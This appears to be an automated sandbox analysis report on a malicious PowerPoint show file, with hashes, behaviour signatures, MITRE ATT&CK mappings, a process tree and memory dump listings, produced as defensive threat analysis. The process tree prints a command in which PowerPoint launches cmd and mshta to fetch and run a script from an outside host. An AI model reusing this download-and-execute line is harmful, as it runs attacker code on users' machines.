c1110237231589eb7cb435f52783b0eb917baca45b075e8f78d5b78a0fe66688

General

Target

c1110237231589eb7cb435f52783b0eb917baca45b075e8f78d5b78a0fe66688.pps
Size

707KB
MD5

1622576dd5cc993ae42f5c35b4b9ed2f
SHA1

6071d99ea546e6d74656bf8114bcd7a663eb84ba
SHA256

c1110237231589eb7cb435f52783b0eb917baca45b075e8f78d5b78a0fe66688
SHA512

6d9501e71c7095050b1bd8a2ca467f926b008c6f36c17ce673b012730e3fc33dc29fd513e875635e6fc6cc446e57a0572477f82df038d4d81870a78447a29804

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 7 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

ping.exeping.exeping.exeping.exeping.execmd.exeping.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3988	784	ping.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2084	784	ping.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	4008	784	ping.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2580	784	ping.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3532	784	ping.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2600	784	cmd.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3872	784	ping.exe	POWERPNT.EXE

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exe

flow pid process

16 3836 mshta.exe
17 3836 mshta.exe
25 3836 mshta.exe

flow	pid	process
16	3836	mshta.exe
17	3836	mshta.exe
25	3836	mshta.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

winword.exePOWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winword.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXEwinword.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	winword.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery
T1018

Processes:

ping.exeping.exeping.exeping.exeping.exeping.exe

pid process

2580 ping.exe
3532 ping.exe
3872 ping.exe
3988 ping.exe
2084 ping.exe
4008 ping.exe
Suspicious behavior: AddClipboardFormatListener 3 IoCs

Processes:

POWERPNT.EXEwinword.exe

pid process

784 POWERPNT.EXE
3992 winword.exe
3992 winword.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

winword.exe

pid process

3992 winword.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

POWERPNT.EXEwinword.exe

pid process

784 POWERPNT.EXE
3992 winword.exe
3992 winword.exe
784 POWERPNT.EXE
3992 winword.exe

pid	process
2580	ping.exe
3532	ping.exe
3872	ping.exe
3988	ping.exe
2084	ping.exe
4008	ping.exe

pid	process
784	POWERPNT.EXE
3992	winword.exe
3992	winword.exe

pid	process
3992	winword.exe

pid	process
784	POWERPNT.EXE
3992	winword.exe
3992	winword.exe
784	POWERPNT.EXE
3992	winword.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

POWERPNT.EXEcmd.exe

description	pid	process	target process
PID 784 wrote to memory of 3988	784	POWERPNT.EXE	ping.exe
PID 784 wrote to memory of 3988	784	POWERPNT.EXE	ping.exe
PID 784 wrote to memory of 2084	784	POWERPNT.EXE	ping.exe
PID 784 wrote to memory of 2084	784	POWERPNT.EXE	ping.exe
PID 784 wrote to memory of 4008	784	POWERPNT.EXE	ping.exe
PID 784 wrote to memory of 4008	784	POWERPNT.EXE	ping.exe
PID 784 wrote to memory of 3872	784	POWERPNT.EXE	ping.exe
PID 784 wrote to memory of 3872	784	POWERPNT.EXE	ping.exe
PID 784 wrote to memory of 2580	784	POWERPNT.EXE	ping.exe
PID 784 wrote to memory of 2580	784	POWERPNT.EXE	ping.exe
PID 784 wrote to memory of 3532	784	POWERPNT.EXE	ping.exe
PID 784 wrote to memory of 3532	784	POWERPNT.EXE	ping.exe
PID 784 wrote to memory of 2600	784	POWERPNT.EXE	cmd.exe
PID 784 wrote to memory of 2600	784	POWERPNT.EXE	cmd.exe
PID 2600 wrote to memory of 3836	2600	cmd.exe	mshta.exe
PID 2600 wrote to memory of 3836	2600	cmd.exe	mshta.exe
PID 784 wrote to memory of 3992	784	POWERPNT.EXE	winword.exe
PID 784 wrote to memory of 3992	784	POWERPNT.EXE	winword.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\c1110237231589eb7cb435f52783b0eb917baca45b075e8f78d5b78a0fe66688.pps" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:784

C:\Windows\SYSTEM32\ping.exe
ping
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:3988

C:\Windows\SYSTEM32\ping.exe
ping
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:2084

C:\Windows\SYSTEM32\ping.exe
ping
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:4008

C:\Windows\SYSTEM32\ping.exe
ping
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:2580

C:\Windows\SYSTEM32\ping.exe
ping
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:3532

C:\Windows\SYSTEM32\cmd.exe
cmd /c mshta http://1230948%[email protected]/jasidjijasdasdjjj
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\system32\mshta.exe
mshta http://1230948%[email protected]/jasidjijasdasdjjj
3⤵
- Blocklisted process makes network request
PID:3836

C:\Windows\SYSTEM32\ping.exe
ping
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:3872

C:\Program Files\Microsoft Office\Root\Office16\winword.exe
winword.exe
2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3992

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
MD5
597c3953c957a3a9037b93f637233fb6

SHA1
640c81f41bb10f016a893c595e253f1b2dc57fc3

SHA256
12521c0f1e9afbc0a21eb8fef2c408ee5ffe1e403b7d14c7c256b3b5bb4705a2

SHA512
74f788d321b686d9a0fd83fa55ddd5a3e5e3293b30ad79881d9cce607daddeed1ace45cbfede1822b35e765b5685717f1fc029b2c0c7ad91ecd1feb3ea3add62

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
MD5
8bc55372ed084efa4a851fb62e0b8b88

SHA1
a826165026e5a24bf0da1003b9cfa600708803dc

SHA256
278b4098744d7e50540a8fbfe35d46b56945674fb53114e724b19477b17c4169

SHA512
bd54991561173e700b417dc53640a4f15e2e5a3f34fcff91a81c3e7b04b1aff038eaae122a3fd3656b1bafe20b1d1cab4291eaa2bba8f914260393329ad721db

Download Submit
memory/784-122-0x0000018478A70000-0x0000018479B5E000-memory.dmp

Filesize
16.9MB

Download
memory/784-117-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp

Filesize
64KB

Download
memory/784-119-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp

Filesize
64KB

Download
memory/784-118-0x00007FFDF8EB0000-0x00007FFDFAA8D000-memory.dmp

Filesize
27.9MB

Download
memory/784-123-0x00007FFDF2250000-0x00007FFDF4145000-memory.dmp

Filesize
31.0MB

Download
memory/784-116-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp

Filesize
64KB

Download
memory/784-115-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp

Filesize
64KB

Download
memory/784-114-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp

Filesize
64KB

Download
memory/2084-133-0x0000000000000000-mapping.dmp

Download
memory/2580-136-0x0000000000000000-mapping.dmp

Download
memory/2600-138-0x0000000000000000-mapping.dmp

Download
memory/3532-137-0x0000000000000000-mapping.dmp

Download
memory/3836-156-0x0000000000000000-mapping.dmp

Download
memory/3872-135-0x0000000000000000-mapping.dmp

Download
memory/3988-132-0x0000000000000000-mapping.dmp

Download
memory/3992-187-0x0000000000000000-mapping.dmp

Download
memory/4008-134-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads